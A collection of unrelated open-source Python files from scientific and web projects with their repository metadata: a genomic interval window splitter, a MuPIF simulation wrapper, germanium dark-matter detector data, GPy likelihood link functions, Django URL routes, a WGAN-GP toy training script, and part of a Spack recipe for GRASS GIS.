"ASE",
"GPAW"
] |
c44c848ac90d9d62d2cdc820e4e1a3fc87b5b89cb0b9b9db20fc1c737ce15072
|
#! /usr/bin/python
"""
Split into windows.
usage: %prog input size out_file
-l, --cols=N,N,N,N: Columns for chrom, start, end, strand in file
"""
import sys, re, os
from galaxy import eggs
import pkg_resources; pkg_resources.require( "bx-python" )
from bx.cookbook import doc_optparse
from galaxy.tools.util.galaxyops import *
def stop_err( msg ):
sys.stderr.write( msg )
sys.exit()
def main():
# Parsing Command Line here
options, args = doc_optparse.parse( __doc__ )
try:
chr_col_1, start_col_1, end_col_1, strand_col_1 = parse_cols_arg( options.cols )
inp_file, winsize, out_file, makesliding, offset = args
winsize = int(winsize)
offset = int(offset)
makesliding = int(makesliding)
if strand_col_1 <= 0:
strand = "+" #if strand is not defined, default it to +
except:
stop_err( "Data issue, click the pencil icon in the history item to correct the metadata attributes of the input dataset." )
fo = open(out_file,'w')
skipped_lines = 0
first_invalid_line = 0
invalid_line = None
if offset == 0:
makesliding = 0
for i, line in enumerate( file( inp_file ) ):
line = line.strip()
if line and line[0:1] != "#":
try:
elems = line.split('\t')
if strand_col_1 != -1:
strand = elems[strand_col_1]
start = int(elems[start_col_1])
end = int(elems[end_col_1])
if makesliding == 0:
numwin = (end - start)/winsize
else:
numwin = (end - start)/offset
if numwin > 0:
for win in range(numwin):
elems_1 = elems
elems_1[start_col_1] = str(start)
elems_1[end_col_1] = str(start + winsize)
fo.write( "%s\n" % '\t'.join( elems_1 ) )
if makesliding == 0:
start = start + winsize
else:
start = start + offset
if start+winsize > end:
break
except:
skipped_lines += 1
if not invalid_line:
first_invalid_line = i + 1
invalid_line = line
fo.close()
if makesliding == 1:
print 'Window size=%d, Sliding=Yes, Offset=%d' %(winsize, offset)
else:
print 'Window size=%d, Sliding=No' %(winsize)
if skipped_lines > 0:
print 'Skipped %d invalid lines starting with #%d: "%s"' % ( skipped_lines, first_invalid_line, invalid_line )
if __name__ == "__main__":
main()
|
volpino/Yeps-EURAC
|
tools/regVariation/windowSplitter.py
|
Python
|
mit
| 2,834
|
[
"Galaxy"
] |
46357c98e6f042cd621c25421d8fb5fb08649b46947dbf48a83223dc43cfaf95
|
import sys
sys.path.append('../../..')
sys.path.append('.')
from mupif import VtkReader2
from mupif import Model
from mupif import FieldID
import pyvtk
import logging
log = logging.getLogger()
import mupif.physics.physicalquantities as PQ
timeUnits = PQ.PhysicalUnit('s', 1., [0,0,1,0,0,0,0,0,0])
##
vtkreader2.pyvtk_monkeypatch()
class Micress(model.Model):
def __init__ (self, file):
super(Micress, self).__init__(file)
self.mesh = None
super(Micress, self).__init__(file)
def getField(self, fieldID, time):
Data = pyvtk.VtkData('micress/sim.vtk')
log.debug(Data.header)
dim=[]
dim=Data.structure.dimensions
log.debug(dim)
#Number of nodes in each direction
nx=dim[0]
ny=dim[1]
nz=dim[2]
#coordinates of the points
coords=[]
coords= Data.structure.get_points()
numNodes = Data.point_data.length
log.debug(numNodes)
if (self.mesh == None):
self.mesh = vtkreader2.readMesh(numNodes,nx,ny,nz,coords)
f = vtkreader2.readField(self.mesh, Data,FieldID.FID_Concentration, PQ.getDimensionlessUnit(), timeUnits, "conc1", "micress/sim.vtk", 1)
return f
def solveStep(self, tstep, stageID=0, runInBackground=False):
time = tstep.getTime()
self.value=1.0*time
def getCriticalTimeStep(self):
return PQ.PhysicalQuantity(0.1,'s')
|
mupif/mupif
|
obsolete/examples/Example07-micress-local/Micress.py
|
Python
|
lgpl-3.0
| 1,447
|
[
"VTK"
] |
22089c97f9ebfd6d13e99d5af2e31e2cffaa50e4614ed5fd609ac447214e5be1
|
"""
Copyright (c) 2015 Andreea Georgescu
Created on Wed Nov 19 00:18:55 2014
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from __future__ import absolute_import
from __future__ import division
import numpy as np
pi = np.pi
name = "CDMSlite2013CoGeNTQ"
modulated = False
energy_resolution_type = "Gaussian"
def EnergyResolution(e):
return 0.014 * np.ones_like(e)
FFSD = 'GaussianFFSD'
FFSI = 'HelmFF'
FF = {'SI': FFSI,
'SDPS': FFSD,
'SDAV': FFSD,
}
target_nuclide_AZC_list = np.array([[70., 32., 0.19608], [72., 32., 0.27040],
[73., 32., 0.07790], [74., 32., 0.37378],
[76., 32., 0.08184]])
target_nuclide_JSpSn_list = \
np.array([[0., 0., 0.], [0., 0., 0.],
[9./2, 0.0392517 * np.sqrt(((2*9./2 + 1)*(9./2 + 1))/(4*pi*9./2)),
.375312 * np.sqrt(((2*9./2 + 1)*(9./2 + 1))/(4*pi*9./2))],
[0., 0., 0.], [0., 0., 0.]])
target_nuclide_mass_list = np.array([65.134, 66.995, 67.9278, 68.8571, 70.7203])
num_target_nuclides = target_nuclide_mass_list.size
def QuenchingFactor(e):
return (1 + 69./3 * 0.19935 * e**0.1204)/(1 + 69./3)
Ethreshold = 0.17
Emaximum = 7
ERmaximum = 7
def Efficiency(e): return np.array(0.985) if Ethreshold <= e < Emaximum else np.array(0.)
def Efficiency_ER(er):
return np.ones_like(er)
Exposure = 0.6 * 10.
ERecoilList = np.array([0.10142857142857144, 0.10285714285714286, 0.10428571428571429,
0.10571428571428572, 0.10714285714285715, 0.10857142857142857,
0.11142857142857143, 0.11285714285714286, 0.1142857142857143,
0.11571428571428571, 0.11714285714285715, 0.11857142857142858,
0.12142857142857144, 0.12285714285714286, 0.12428571428571429,
0.12571428571428572, 0.12714285714285714, 0.1285714285714286,
0.13166666666666668, 0.13333333333333333, 0.135,
0.1366666666666667, 0.13833333333333334, 0.14333333333333334,
0.1466666666666667, 0.15333333333333335, 0.15666666666666668,
0.165, 0.17333333333333334, 0.17666666666666667, 0.185,
0.19333333333333333, 0.19666666666666668, 0.20500000000000002,
0.21500000000000002, 0.255, 0.265, 0.29500000000000004, 0.315,
0.345, 0.405, 0.41500000000000004, 0.42500000000000004,
0.43500000000000005, 0.46499999999999997, 0.485, 0.495, 0.515,
0.555, 0.5650000000000001, 0.645, 0.705, 0.745, 0.785, 0.815,
0.845, 0.895, 0.905, 0.935, 1.085, 1.125, 1.1550000000000002,
1.185, 1.2233333333333336, 1.2266666666666668,
1.2333333333333336, 1.2366666666666668, 1.2633333333333334,
1.2666666666666666, 1.275, 1.2825, 1.2850000000000001, 1.2875,
1.2925, 1.295, 1.2975, 1.302, 1.304, 1.306, 1.308,
1.3133333333333335, 1.3166666666666667, 1.3250000000000002,
1.3333333333333335, 1.3366666666666667, 1.3450000000000002,
1.3533333333333335, 1.3566666666666667, 1.3650000000000002,
1.3733333333333335, 1.3766666666666667, 1.395, 1.455, 1.495,
1.525, 1.6124999999999998, 1.7624999999999997, 1.9125, 1.96875,
1.9874999999999998, 2.00625, 2.0625, 2.2874999999999996,
2.34375, 2.3625, 2.3812499999999996, 2.4375, 2.5125, 2.65,
2.675, 2.71875, 2.7375, 2.7562499999999996, 2.8125, 2.875,
2.9, 2.9625, 3.0374999999999996, 3.0999999999999996, 3.125,
3.175, 3.2, 3.2625, 3.4124999999999996, 3.4875,
3.6249999999999996, 3.65, 3.7125, 3.7874999999999996, 3.8625,
3.9375, 4.0875, 4.1625, 4.225, 4.25, 4.364999999999999, 4.38,
4.395, 4.41, 4.44375, 4.4625, 4.48125, 4.5375, 4.675,
4.699999999999999, 4.762499999999999, 4.825, 4.85, 4.9125,
4.96875, 4.9875, 5.00625, 5.05, 5.074999999999999, 5.2125,
5.2875, 5.35, 5.375, 5.5, 5.5249999999999995, 5.5875, 5.725,
5.75, 5.8, 5.824999999999999, 5.8687499999999995,
5.887499999999999, 5.90625, 5.95, 5.975, 6.1, 6.125, 6.175,
6.199999999999999, 6.4125, 6.465, 6.4799999999999995, 6.495,
6.51, 6.5625, 6.6187499999999995, 6.637499999999999, 6.65625,
6.7125, 6.775, 6.8, 6.914999999999999, 6.93, 6.944999999999999,
6.96, 7.012499999999999, 7.0875, 7.1625, 7.3,
7.324999999999999, 7.387499999999999, 7.4625, 7.5125,
7.5249999999999995, 7.5375, 7.55, 7.562499999999999, 7.825,
7.85, 7.8999999999999995, 7.925, 7.975, 8., 8.0625, 8.1375,
8.212499999999999, 8.34, 8.355, 8.37, 8.385, 8.425, 8.45,
8.493749999999999, 8.5125, 8.53125, 8.565, 8.58,
8.594999999999999, 8.61, 8.6625, 8.712499999999999, 8.725,
8.7375, 8.75, 8.7625, 8.8, 8.825, 8.862499999999999, 8.875,
8.8875, 8.899999999999999, 8.9125, 8.931818181818182,
8.938636363636363, 8.945454545454545, 8.952272727272726,
8.959090909090909, 8.96590909090909, 8.972727272727273,
8.979545454545454, 8.986363636363636, 8.993181818181817, 9.015,
9.03, 9.045, 9.059999999999999, 9.09, 9.105, 9.12, 9.135,
9.160714285714286, 9.17142857142857, 9.182142857142857,
9.192857142857143, 9.20357142857143, 9.214285714285714,
9.237499999999999, 9.25, 9.2625, 9.274999999999999, 9.2875,
9.337499999999999, 9.39375, 9.4125, 9.431249999999999, 9.46875,
9.4875, 9.50625, 9.55, 9.575, 9.618749999999999, 9.6375,
9.65625, 9.712499999999999, 9.765, 9.78, 9.795,
9.809999999999999, 9.8325, 9.84, 9.8475, 9.855, 9.8625, 9.87,
9.8775, 9.885, 9.8925, 9.908333333333333, 9.916666666666666,
9.925, 9.933333333333334, 9.941666666666666, 9.95,
9.958333333333334, 9.966666666666667, 9.985714285714286,
9.99642857142857, 10.007142857142856, 10.017857142857142,
10.028571428571428, 10.039285714285713, 10.055357142857142,
10.060714285714285, 10.066071428571428, 10.071428571428571,
10.076785714285714, 10.082142857142857, 10.087499999999999,
10.092857142857142, 10.098214285714285, 10.103571428571428,
10.10892857142857, 10.114285714285714, 10.119642857142857,
10.128125, 10.13125, 10.134375, 10.1375, 10.140625, 10.14375,
10.146875, 10.15, 10.153125, 10.15625, 10.159374999999999,
10.1625, 10.165625, 10.16875, 10.171875, 10.174999999999999,
10.178125, 10.181249999999999, 10.184375, 10.1875,
10.190624999999999, 10.19375, 10.196874999999999, 10.203125,
10.206249999999999, 10.209375, 10.212499999999999, 10.215625,
10.21875, 10.221874999999999, 10.225, 10.228125, 10.23125,
10.234375, 10.2375, 10.240625, 10.24375, 10.246875, 10.25,
10.253125, 10.25625, 10.259375, 10.2625, 10.265625, 10.26875,
10.271875, 10.27734375, 10.2796875, 10.282031250000001,
10.284375, 10.28671875, 10.2890625, 10.29140625, 10.29375,
10.29609375, 10.2984375, 10.30078125, 10.303125, 10.30546875,
10.3078125, 10.31015625, 10.3125, 10.31484375, 10.3171875,
10.31953125, 10.321875, 10.32421875, 10.3265625, 10.32890625,
10.33125, 10.33359375, 10.3359375, 10.33828125, 10.340625,
10.342968749999999, 10.3453125, 10.34765625, 10.353, 10.356,
10.359, 10.362, 10.365, 10.368, 10.370999999999999,
10.373999999999999, 10.376999999999999, 10.379999999999999,
10.383, 10.386, 10.389, 10.392, 10.395, 10.398, 10.401,
10.404, 10.406999999999998, 10.409999999999998,
10.412999999999998, 10.415999999999999, 10.418999999999999,
10.421999999999999, 10.428260869565216, 10.431521739130433,
10.43478260869565, 10.43804347826087, 10.441304347826087,
10.444565217391304, 10.447826086956521, 10.451086956521738,
10.454347826086956, 10.457608695652173, 10.46086956521739,
10.464130434782609, 10.467391304347826, 10.470652173913043,
10.47391304347826, 10.477173913043478, 10.480434782608695,
10.483695652173912, 10.48695652173913, 10.490217391304348,
10.493478260869566, 10.496739130434783, 10.503947368421052,
10.507894736842106, 10.511842105263158, 10.51578947368421,
10.519736842105264, 10.523684210526316, 10.527631578947368,
10.531578947368422, 10.535526315789474, 10.539473684210526,
10.543421052631578, 10.547368421052632, 10.551315789473684,
10.555263157894736, 10.55921052631579, 10.563157894736841,
10.567105263157893, 10.571052631578947, 10.581249999999999,
10.587499999999999, 10.59375, 10.6, 10.60625, 10.6125,
10.61875, 10.625, 10.63125, 10.6375, 10.64375, 10.66875,
10.6875, 10.70625, 10.743749999999999, 10.7625, 10.78125,
10.837499999999999, 10.89, 10.905, 10.92, 10.934999999999999,
10.96875, 10.9875, 11.00625, 11.0625, 11.1375,
11.212499999999999, 11.3625, 11.5125, 11.587499999999999, 11.7375])
|
SamWitte/Codds_DarkMatter
|
src/Data/CDMSlite2013CoGeNTQ.py
|
Python
|
gpl-2.0
| 11,135
|
[
"Gaussian"
] |
d1facc7c2d405d47383f6182896dfae6c5d8d364156a3e6f120638c892284717
|
# Copyright (c) 2012-2015 The GPy authors (see AUTHORS.txt)
# Licensed under the BSD 3-clause license (see LICENSE.txt)
import numpy as np
import scipy
from ..util.univariate_Gaussian import std_norm_cdf, std_norm_pdf
import scipy as sp
from ..util.misc import safe_exp, safe_square, safe_cube, safe_quad, safe_three_times
class GPTransformation(object):
"""
Link function class for doing non-Gaussian likelihoods approximation
:param Y: observed output (Nx1 numpy.darray)
.. note:: Y values allowed depend on the likelihood_function used
"""
def __init__(self):
pass
def transf(self,f):
"""
Gaussian process tranformation function, latent space -> output space
"""
raise NotImplementedError
def dtransf_df(self,f):
"""
derivative of transf(f) w.r.t. f
"""
raise NotImplementedError
def d2transf_df2(self,f):
"""
second derivative of transf(f) w.r.t. f
"""
raise NotImplementedError
def d3transf_df3(self,f):
"""
third derivative of transf(f) w.r.t. f
"""
raise NotImplementedError
class Identity(GPTransformation):
"""
.. math::
g(f) = f
"""
def transf(self,f):
return f
def dtransf_df(self,f):
return np.ones_like(f)
def d2transf_df2(self,f):
return np.zeros_like(f)
def d3transf_df3(self,f):
return np.zeros_like(f)
class Probit(GPTransformation):
"""
.. math::
g(f) = \\Phi^{-1} (mu)
"""
def transf(self,f):
return std_norm_cdf(f)
def dtransf_df(self,f):
return std_norm_pdf(f)
def d2transf_df2(self,f):
return -f * std_norm_pdf(f)
def d3transf_df3(self,f):
return (safe_square(f)-1.)*std_norm_pdf(f)
class Cloglog(GPTransformation):
"""
Complementary log-log link
.. math::
p(f) = 1 - e^{-e^f}
or
f = \log (-\log(1-p))
"""
def transf(self,f):
ef = safe_exp(f)
return 1-np.exp(-ef)
def dtransf_df(self,f):
ef = safe_exp(f)
return np.exp(f-ef)
def d2transf_df2(self,f):
ef = safe_exp(f)
return -np.exp(f-ef)*(ef-1.)
def d3transf_df3(self,f):
ef = safe_exp(f)
ef2 = safe_square(ef)
three_times_ef = safe_three_times(ef)
r_val = np.exp(f-ef)*(1.-three_times_ef + ef2)
return r_val
class Log(GPTransformation):
"""
.. math::
g(f) = \\log(\\mu)
"""
def transf(self,f):
return safe_exp(f)
def dtransf_df(self,f):
return safe_exp(f)
def d2transf_df2(self,f):
return safe_exp(f)
def d3transf_df3(self,f):
return safe_exp(f)
class Log_ex_1(GPTransformation):
"""
.. math::
g(f) = \\log(\\exp(\\mu) - 1)
"""
def transf(self,f):
return scipy.special.log1p(safe_exp(f))
def dtransf_df(self,f):
ef = safe_exp(f)
return ef/(1.+ef)
def d2transf_df2(self,f):
ef = safe_exp(f)
aux = ef/(1.+ef)
return aux*(1.-aux)
def d3transf_df3(self,f):
ef = safe_exp(f)
aux = ef/(1.+ef)
daux_df = aux*(1.-aux)
return daux_df - (2.*aux*daux_df)
class Reciprocal(GPTransformation):
def transf(self,f):
return 1./f
def dtransf_df(self, f):
f2 = safe_square(f)
return -1./f2
def d2transf_df2(self, f):
f3 = safe_cube(f)
return 2./f3
def d3transf_df3(self,f):
f4 = safe_quad(f)
return -6./f4
class Heaviside(GPTransformation):
"""
.. math::
g(f) = I_{x \\geq 0}
"""
def transf(self,f):
#transformation goes here
return np.where(f>0, 1, 0)
def dtransf_df(self,f):
raise NotImplementedError("This function is not differentiable!")
def d2transf_df2(self,f):
raise NotImplementedError("This function is not differentiable!")
|
mikecroucher/GPy
|
GPy/likelihoods/link_functions.py
|
Python
|
bsd-3-clause
| 4,019
|
[
"Gaussian"
] |
23f41069264c15b13dfb0556ddb6d339f9c8bec01c18c462c9bfebe85b12ce51
|
from django.conf.urls import include, url
# from django.conf import settings
from django.contrib import admin
from wagtail.wagtailadmin import urls as wagtailadmin_urls
from wagtail.wagtaildocs import urls as wagtaildocs_urls
from wagtail.wagtailcore import urls as wagtail_urls
from wapps import urls as wapps_urls
from .views import error, first_visit, site_feed
urlpatterns = [
url(r'^django-admin/', include(admin.site.urls)),
url(r'^admin/', include(wagtailadmin_urls)),
url(r'^documents/', include(wagtaildocs_urls)),
url(r'^search/', include('wagtail.wagtailsearch.urls.frontend')),
# Test views
url(r'^error/$', error, name='error'),
url(r'^first-visit/$', first_visit, name='first-visit'),
url(r'^atom/$', site_feed, name='atom'),
# url(r'^i18n/', include('django.conf.urls.i18n')),
# url(r'^forms/', include(wapps_forms_urls)),
# url('^sitemap\.xml$', sitemap),
url(r'', include(wapps_urls)),
url(r'', include(wagtail_urls)),
]
|
apihackers/wapps
|
tests/app/urls.py
|
Python
|
mit
| 1,001
|
[
"VisIt"
] |
2eda3ff657bbbf02a9540c59d0a16d311332d42a5ed5af49ccbf8c11ddc23189
|
import os, sys
sys.path.append(os.getcwd())
import random
import time
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
import sklearn.datasets
import tflib as lib
import tflib.ops.linear
import tflib.plot
MODE = 'wgan-gp' # wgan or wgan-gp
DATASET = '8gaussians' # 8gaussians, 25gaussians, swissroll
DIM = 512 # Model dimensionality
FIXED_GENERATOR = False # whether to hold the generator fixed at real data plus
# Gaussian noise, as in the plots in the paper
LAMBDA = .1 # Smaller lambda seems to help for toy tasks specifically
CRITIC_ITERS = 5 # How many critic iterations per generator iteration
BATCH_SIZE = 256 # Batch size
ITERS = 100000 # how many generator iterations to train for
lib.print_model_settings(locals().copy())
def ReLULayer(name, n_in, n_out, inputs):
output = lib.ops.linear.Linear(
name+'.Linear',
n_in,
n_out,
inputs,
initialization='he'
)
output = tf.nn.relu(output)
return output
def Generator(n_samples, real_data):
if FIXED_GENERATOR:
return real_data + (1.*tf.random_normal(tf.shape(real_data)))
else:
noise = tf.random_normal([n_samples, 2])
output = ReLULayer('Generator.1', 2, DIM, noise)
output = ReLULayer('Generator.2', DIM, DIM, output)
output = ReLULayer('Generator.3', DIM, DIM, output)
output = lib.ops.linear.Linear('Generator.4', DIM, 2, output)
return output
def Discriminator(inputs):
output = ReLULayer('Discriminator.1', 2, DIM, inputs)
output = ReLULayer('Discriminator.2', DIM, DIM, output)
output = ReLULayer('Discriminator.3', DIM, DIM, output)
output = lib.ops.linear.Linear('Discriminator.4', DIM, 1, output)
return tf.reshape(output, [-1])
real_data = tf.placeholder(tf.float32, shape=[None, 2])
fake_data = Generator(BATCH_SIZE, real_data)
disc_real = Discriminator(real_data)
disc_fake = Discriminator(fake_data)
# WGAN loss
disc_cost = tf.reduce_mean(disc_fake) - tf.reduce_mean(disc_real)
gen_cost = -tf.reduce_mean(disc_fake)
# WGAN gradient penalty
if MODE == 'wgan-gp':
alpha = tf.random_uniform(
shape=[BATCH_SIZE,1],
minval=0.,
maxval=1.
)
interpolates = alpha*real_data + ((1-alpha)*fake_data)
disc_interpolates = Discriminator(interpolates)
gradients = tf.gradients(disc_interpolates, [interpolates])[0]
slopes = tf.sqrt(tf.reduce_sum(tf.square(gradients), reduction_indices=[1]))
gradient_penalty = tf.reduce_mean((slopes-1)**2)
disc_cost += LAMBDA*gradient_penalty
disc_params = lib.params_with_name('Discriminator')
gen_params = lib.params_with_name('Generator')
if MODE == 'wgan-gp':
disc_train_op = tf.train.AdamOptimizer(
learning_rate=1e-4,
beta1=0.5,
beta2=0.9
).minimize(
disc_cost,
var_list=disc_params
)
if len(gen_params) > 0:
gen_train_op = tf.train.AdamOptimizer(
learning_rate=1e-4,
beta1=0.5,
beta2=0.9
).minimize(
gen_cost,
var_list=gen_params
)
else:
gen_train_op = tf.no_op()
else:
disc_train_op = tf.train.RMSPropOptimizer(learning_rate=5e-5).minimize(
disc_cost,
var_list=disc_params
)
if len(gen_params) > 0:
gen_train_op = tf.train.RMSPropOptimizer(learning_rate=5e-5).minimize(
gen_cost,
var_list=gen_params
)
else:
gen_train_op = tf.no_op()
# Build an op to do the weight clipping
clip_ops = []
for var in disc_params:
clip_bounds = [-.01, .01]
clip_ops.append(
tf.assign(
var,
tf.clip_by_value(var, clip_bounds[0], clip_bounds[1])
)
)
clip_disc_weights = tf.group(*clip_ops)
print "Generator params:"
for var in lib.params_with_name('Generator'):
print "\t{}\t{}".format(var.name, var.get_shape())
print "Discriminator params:"
for var in lib.params_with_name('Discriminator'):
print "\t{}\t{}".format(var.name, var.get_shape())
frame_index = [0]
def generate_image(true_dist):
"""
Generates and saves a plot of the true distribution, the generator, and the
critic.
"""
N_POINTS = 128
RANGE = 3
points = np.zeros((N_POINTS, N_POINTS, 2), dtype='float32')
points[:,:,0] = np.linspace(-RANGE, RANGE, N_POINTS)[:,None]
points[:,:,1] = np.linspace(-RANGE, RANGE, N_POINTS)[None,:]
points = points.reshape((-1,2))
samples, disc_map = session.run(
[fake_data, disc_real],
feed_dict={real_data:points}
)
disc_map = session.run(disc_real, feed_dict={real_data:points})
plt.clf()
x = y = np.linspace(-RANGE, RANGE, N_POINTS)
plt.contour(x,y,disc_map.reshape((len(x), len(y))).transpose())
plt.scatter(true_dist[:, 0], true_dist[:, 1], c='orange', marker='+')
plt.scatter(samples[:, 0], samples[:, 1], c='green', marker='+')
plt.savefig('frame'+str(frame_index[0])+'.jpg')
frame_index[0] += 1
# Dataset iterator
def inf_train_gen():
if DATASET == '25gaussians':
dataset = []
for i in xrange(100000/25):
for x in xrange(-2, 3):
for y in xrange(-2, 3):
point = np.random.randn(2)*0.05
point[0] += 2*x
point[1] += 2*y
dataset.append(point)
dataset = np.array(dataset, dtype='float32')
np.random.shuffle(dataset)
dataset /= 2.828 # stdev
while True:
for i in xrange(len(dataset)/BATCH_SIZE):
yield dataset[i*BATCH_SIZE:(i+1)*BATCH_SIZE]
elif DATASET == 'swissroll':
while True:
data = sklearn.datasets.make_swiss_roll(
n_samples=BATCH_SIZE,
noise=0.25
)[0]
data = data.astype('float32')[:, [0, 2]]
data /= 7.5 # stdev plus a little
yield data
elif DATASET == '8gaussians':
scale = 2.
centers = [
(1,0),
(-1,0),
(0,1),
(0,-1),
(1./np.sqrt(2), 1./np.sqrt(2)),
(1./np.sqrt(2), -1./np.sqrt(2)),
(-1./np.sqrt(2), 1./np.sqrt(2)),
(-1./np.sqrt(2), -1./np.sqrt(2))
]
centers = [(scale*x,scale*y) for x,y in centers]
while True:
dataset = []
for i in xrange(BATCH_SIZE):
point = np.random.randn(2)*.02
center = random.choice(centers)
point[0] += center[0]
point[1] += center[1]
dataset.append(point)
dataset = np.array(dataset, dtype='float32')
dataset /= 1.414 # stdev
yield dataset
# Train loop!
with tf.Session() as session:
session.run(tf.initialize_all_variables())
gen = inf_train_gen()
for iteration in xrange(ITERS):
# Train generator
if iteration > 0:
_ = session.run(gen_train_op)
# Train critic
for i in xrange(CRITIC_ITERS):
_data = gen.next()
_disc_cost, _ = session.run(
[disc_cost, disc_train_op],
feed_dict={real_data: _data}
)
if MODE == 'wgan':
_ = session.run([clip_disc_weights])
# Write logs and save samples
lib.plot.plot('disc cost', _disc_cost)
if iteration % 100 == 99:
lib.plot.flush()
generate_image(_data)
lib.plot.tick()
|
aalitaiga/improved_wgan_training
|
gan_toy.py
|
Python
|
mit
| 7,675
|
[
"Gaussian"
] |
780ef574882abff5f29aadd2001ef205aaafd44efa7a7cff5ebfb36c8060a2b7
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Grass(AutotoolsPackage):
"""GRASS GIS (Geographic Resources Analysis Support System), is a free
and open source Geographic Information System (GIS) software suite
used for geospatial data management and analysis, image processing,
graphics and maps production, spatial modeling, and visualization."""
homepage = "https://grass.osgeo.org"
url = "https://grass.osgeo.org/grass78/source/grass-7.8.5.tar.gz"
list_url = "https://grass.osgeo.org/download/software/sources/"
git = "https://github.com/OSGeo/grass.git"
maintainers = ['adamjstewart']
version('master', branch='master')
version('7.8.5', sha256='a359bb665524ecccb643335d70f5436b1c84ffb6a0e428b78dffebacd983ff37')
version('7.8.2', sha256='33576f7078f805b39ca20c2fa416ac79c64260c0581072a6dc7d813f53aa9abb')
version('7.8.1', sha256='6ae578fd67afcce7abec4ba4505dcc55b3d2dfe0ca46b99d966cb148c654abb3')
version('7.8.0', sha256='4b1192294e959ffd962282344e4ff325c4472f73abe605e246a1da3beda7ccfa')
version('7.6.1', sha256='9e25c99cafd16ed8f5e2dca75b5a10dc2af0568dbedf3fc39f1c5a0a9c840b0b', deprecated=True)
version('7.4.4', sha256='96a39e273103f7375a670eba94fa3e5dad2819c5c5664c9aee8f145882a94e8c', deprecated=True)
version('7.4.3', sha256='004e65693ee97fd4d5dc7ad244e3286a115dccd88964d04be61c07db6574b399', deprecated=True)
version('7.4.2', sha256='18eb19bc0aa4cd7be3f30f79ac83f9d0a29c63657f4c1b05bf4c5d5d57a8f46d', deprecated=True)
version('7.4.1', sha256='560b8669caaafa9e8dbd4bbf2b4b4bbab7dca1cc46ee828eaf26c744fe0635fc', deprecated=True)
version('7.4.0', sha256='cb6fa188e030a3a447fc5451fbe0ecbeb4069ee2fd1bf52ed8e40e9b89e293cc', deprecated=True)
variant('cxx', default=True, description='Support C++ functionality')
variant('tiff', default=False, description='Support TIFF functionality')
variant('png', default=False, description='Support PNG functionality')
variant('postgres', default=False, description='Support PostgreSQL functionality')
variant('mysql', default=False, description='Support MySQL functionality')
variant('sqlite', default=False, description='Support SQLite functionality')
variant('opengl', default=False, description='Support OpenGL functionality')
variant('odbc', default=False, description='Support ODBC functionality')
variant('fftw', default=False, description='Support FFTW functionality')
variant('blas', default=False, description='Support BLAS functionality')
variant('lapack', default=False, description='Support LAPACK functionality')
variant('cairo', default=False, description='Support Cairo functionality')
variant('freetype', default=False, description='Support FreeType functionality')
variant('readline', default=False, description='Support Readline functionality')
variant('regex', default=False, description='Support regex functionality')
variant('pthread', default=False, description='Support POSIX threads functionality')
variant('openmp', default=False, description='Support OpenMP functionality')
variant('opencl', default=False, description='Support OpenCL functionality')
variant('bzlib', default=False, description='Support BZIP2 functionality')
variant('zstd', default=False, description='Support Zstandard functionality')
variant('gdal', default=True, description='Enable GDAL/OGR support')
variant('liblas', default=False, description='Enable libLAS support')
variant('wxwidgets', default=False, description='Enable wxWidgets support')
variant('netcdf', default=False, description='Enable NetCDF support')
variant('geos', default=False, description='Enable GEOS support')
variant('x', default=False, description='Use the X Window System')
# https://htmlpreview.github.io/?https://github.com/OSGeo/grass/blob/master/REQUIREMENTS.html
# General requirements
depends_on('gmake@3.81:', type='build')
depends_on('iconv')
depends_on('zlib')
depends_on('flex', type='build')
depends_on('bison', type='build')
depends_on('proj')
depends_on('proj@:4', when='@:7.5')
# GRASS 7.8.0 was supposed to support PROJ 6, but it still checks for
# share/proj/epsg, which was removed in PROJ 6
depends_on('proj@:5', when='@:7.8.0')
# PROJ6 support released in GRASS 7.8.1
# https://courses.neteler.org/grass-gis-7-8-1-released-with-proj-6-and-gdal-3-support/
depends_on('proj@6:', when='@7.8.1:')
depends_on('python@2.7:', type=('build', 'run'))
depends_on('python@2.7:2.8', when='@:7.6', type=('build', 'run'))
depends_on('py-six', when='@7.8:', type=('build', 'run'))
# Optional packages
depends_on('libtiff', when='+tiff')
depends_on('libpng', when='+png')
depends_on('postgresql', when='+postgres')
depends_on('mariadb', when='+mysql')
depends_on('sqlite', when='+sqlite')
depends_on('gl', when='+opengl')
depends_on('unixodbc', when='+odbc')
depends_on('fftw', when='+fftw')
depends_on('blas', when='+blas')
depends_on('lapack', when='+lapack')
depends_on('cairo@1.5.8:', when='+cairo')
depends_on('freetype', when='+freetype')
depends_on('readline', when='+readline')
depends_on('opencl', when='+opencl')
depends_on('bzip2', when='+bzlib')
depends_on('zstd', when='+zstd')
depends_on('gdal@:3.2', when='+gdal')
depends_on('liblas', when='+liblas')
depends_on('wxwidgets', when='+wxwidgets')
depends_on('py-wxpython@2.8.10.1:', when='+wxwidgets', type=('build', 'run'))
depends_on('netcdf-c', when='+netcdf')
depends_on('geos', when='+geos')
depends_on('libx11', when='+x')
def url_for_version(self, version):
url = "https://grass.osgeo.org/grass{0}/source/grass-{1}.tar.gz"
return url.format(version.up_to(2).joined, version)
# https://grasswiki.osgeo.org/wiki/Compile_and_Install
def configure_args(self):
spec = self.spec
args = [
'--without-nls',
# TODO: add packages for these optional dependencies
'--without-opendwg',
'--without-pdal',
'--with-proj-share={0}'.format(spec['proj'].prefix.share.proj),
]
if '+cxx' in spec:
args.append('--with-cxx')
else:
args.append('--without-cxx')
if '+tiff' in spec:
args.append('--with-tiff')
else:
args.append('--without-tiff')
if '+png' in spec:
args.append('--with-png')
else:
args.append('--without-png')
if '+postgres' in spec:
args.append('--with-postgres')
else:
args.append('--without-postgres')
if '+mysql' in spec:
args.append('--with-mysql')
else:
args.append('--without-mysql')
if '+sqlite' in spec:
args.append('--with-sqlite')
else:
args.append('--without-sqlite')
if '+opengl' in spec:
args.append('--with-opengl')
else:
args.append('--without-opengl')
if '+odbc' in spec:
args.append('--with-odbc')
else:
args.append('--without-odbc')
if '+fftw' in spec:
args.append('--with-fftw')
else:
args.append('--without-fftw')
if '+blas' in spec:
args.append('--with-blas')
else:
args.append('--without-blas')
